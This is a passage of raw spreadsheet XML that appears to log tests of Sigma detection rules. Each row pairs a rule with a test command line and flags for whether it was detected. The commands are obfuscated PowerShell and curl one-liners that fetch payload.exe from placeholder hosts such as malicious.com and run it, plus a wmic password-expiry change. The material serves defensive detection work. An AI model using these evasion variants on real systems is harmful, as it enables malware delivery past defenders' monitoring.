      </c>
      <c r="J655" s="43" t="n"/>
      <c r="K655" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1" s="42">
      <c r="A656" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B656" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C656" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D656" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E656" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F656" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G656" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H656" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I656" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J656" s="43" t="n"/>
      <c r="K656" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1" s="42">
      <c r="A657" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B657" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C657" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D657" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E657" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F657" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G657" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H657" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I657" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J657" s="43" t="n"/>
      <c r="K657" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1" s="42">
      <c r="A658" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B658" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C658" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D658" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E658" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F658" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G658" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H658" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I658" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J658" s="43" t="n"/>
      <c r="K658" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1" s="42">
      <c r="A659" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B659" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C659" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D659" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E659" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F659" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G659" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H659" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I659" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J659" s="43" t="n"/>
      <c r="K659" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1" s="42">
      <c r="A660" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B660" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C660" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D660" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E660" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F660" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G660" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H660" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I660" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J660" s="43" t="n"/>
      <c r="K660" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1" s="42">
      <c r="A661" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B661" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C661" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D661" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E661" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F661" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G661" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H661" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I661" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J661" s="43" t="n"/>
      <c r="K661" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1" s="42">
      <c r="A662" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B662" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C662" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D662" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E662" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile "$env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F662" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G662" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H662" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I662" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J662" s="43" t="n"/>
      <c r="K662" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1" s="42">
      <c r="A663" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B663" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C663" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D663" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E663" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G663" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H663" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I663" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J663" s="43" t="n"/>
      <c r="K663" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1" s="42">
      <c r="A664" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B664" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_renamed_execution</t>
        </is>
      </c>
      <c r="C664" s="43" t="inlineStr">
        <is>
          <t>Renamed Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D664" s="43" t="inlineStr">
        <is>
          <t>2cf29f11-e356-4f61-98c0-1bdb9393d6da</t>
        </is>
      </c>
      <c r="E664" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "notepad.exe"</t>
        </is>
      </c>
      <c r="F664" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H664" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I664" s="43" t="n"/>
      <c r="J664" s="43" t="n"/>
      <c r="K664" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1" s="42">
      <c r="A665" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B665" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C665" s="43" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D665" s="43" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E665" s="43" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F665" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H665" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I665" s="43" t="n"/>
      <c r="J665" s="43" t="n"/>
      <c r="K665" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1" s="42">
      <c r="A666" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B666" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C666" s="43" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D666" s="43" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E666" s="43" t="inlineStr">
        <is>
          <t>wmic path Win32_UserAccount where name='guest' set passwordexpires=false</t>
        </is>
      </c>
      <c r="F666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G666" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H666" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I666" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI (7864a175-3654-4824-9f0d-f0da18ab27c0)</t>
        </is>
      </c>
      <c r="J666" s="43" t="n"/>
      <c r="K666" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1" s="42">
      <c r="A667" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B667" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C667" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D667" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E667" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F667" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G667" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H667" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I667" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J667" s="43" t="n"/>
      <c r="K667" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1" s="42">
      <c r="A668" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B668" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C668" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D668" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E668" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F668" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G668" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H668" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I668" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J668" s="43" t="n"/>
      <c r="K668" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1" s="42">
      <c r="A669" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B669" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C669" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D669" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E669" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F669" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G669" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H669" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I669" s="43" t="n"/>
      <c r="J669" s="43" t="n"/>
      <c r="K669" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1" s="42">
      <c r="A670" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C670" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D670" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E670" s="43" t="inlineStr">
        <is>
          <t>powershell -"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F670" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G670" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I670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670" s="43" t="n"/>
      <c r="K670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1" s="42">
      <c r="A671" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B671" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C671" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D671" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E671" s="43" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F671" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G671" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I671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671" s="43" t="n"/>
      <c r="K671" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1" s="42">
      <c r="A672" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B672" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C672" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D672" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E672" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F672" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G672" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I672" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J672" s="43" t="n"/>
      <c r="K672" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1" s="42">
      <c r="A673" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B673" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C673" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D673" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E673" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F673" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G673" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I673" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J673" s="43" t="n"/>
      <c r="K673" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1" s="42">
      <c r="A674" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B674" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C674" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D674" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E674" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F674" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G674" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I674" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J674" s="43" t="n"/>
      <c r="K674" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1" s="42">
      <c r="A675" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B675" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C675" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D675" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E675" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F675" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G675" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I675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675" s="43" t="n"/>
      <c r="K675" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1" s="42">
      <c r="A676" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B676" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C676" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D676" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E676" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F676" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G676" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I676" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download Pattern (3b6ab547-8ec2-4991-b9d2-2b06702a48d7); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J676" s="43" t="n"/>
      <c r="K676" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1" s="42">
      <c r="A677" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B677" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C677" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D677" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E677" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F677" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G677" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I677" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile (8f70ac5f-1f6f-4f8e-b454-db19561216c5); PowerShell DownloadFile (8f70ac5f-1f6f-4f8e-b454-db19561216c5); PowerShell Download Pattern (3b6ab547-8ec2-4991-b9d2-2b06702a48d7); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J677" s="43" t="n"/>
      <c r="K677" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1" s="42">
      <c r="A678" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B678" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C678" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D678" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E678" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F678" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G678" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I678" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J678" s="43" t="n"/>
      <c r="K678" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1" s="42">
      <c r="A679" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B679" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C679" s="43" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D679" s="43" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E679" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"enc" JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F679" s="43" t="b">
        <v>0</v>
